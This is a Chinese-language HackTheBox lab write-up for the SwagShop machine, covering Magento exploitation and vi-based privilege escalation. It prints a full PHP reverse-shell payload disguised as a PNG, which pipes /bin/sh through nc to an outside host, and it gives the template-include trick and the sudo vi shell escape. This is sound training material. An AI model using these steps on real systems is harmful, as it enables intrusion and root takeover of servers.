hackthebox-swagshop(考点：magento安全 & vi提权)

1、nmap

打开80，这是个网站，搜一下可以看到登录框。既然有magento的logo。不妨先查下什么是

2、magento渗透

既然是个著名的电商系统，可以搜一下漏洞 有很多，因为py方便，就选择py，且37977.py前面似乎没写版本要求，可能这个更通用些，就试这个

打开看看，做点修改，把网址改成靶机的网址 运行，报错，根据报错提示，我直接把非code部分都删了 再运行，搞定，生成一个管理员账户 用这个账号进去。

接下来是根据这个，来思考如何拿shell，跟着图片步骤来。

总体思路就是 先点击System –> Configuration 再左下角底部Advanced –> Developer :

再Template Settings –> Allow Symlinks :选择yes。 右上角点击save保存

然后Catalog –> Manage Categories :上传图片，图片里面放shell，前面加magic bytes，伪装成图片。 avtive点yes

.PNG....<?php
passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.57 1337 >/tmp/f");
?>

最后在newsletter-newsletter-template里右边add一个新的template。输入这个

{
          
   {
          
   block type=core/template template=../../../../../../media/catalog/category/此处写你上传的文件名}}

点击保存，跳出后再点击进来，右上部点击preview templates

本机开启监听，收到

这种低权限bash要把它升级，更美观，更有效。以免是个不稳定的shell

先python -c import pty; pty.spawn("/bin/bash")
如果提示没python，那可能有Python3，改为：python3 -c import pty; pty.spawn("/bin/bash")
按ctrl+z
断开了，再输入stty raw -echo
继续输入fg
按两次enter
输入export TERM=screen
输入stty rows 34 cols 136

ok这个shell变稳定了，你按ctrl+c他都不会end。

3、提权

老套路，上看看提权信息，通过wget传进来到tmp

发现这个 vi是文本编辑器，/var/www/html/*意思是这个文件路径里的任何文件。总体思路就是可以以root权限编辑这个路径下的文件，如果我在里面编辑个给shell的命令，就可以了

在里面随便找个文件，sudo /usr/bin/vi /var/www/html/php.ini.sample -c :!/bin/bash或者进文件里加上:!/bin/bash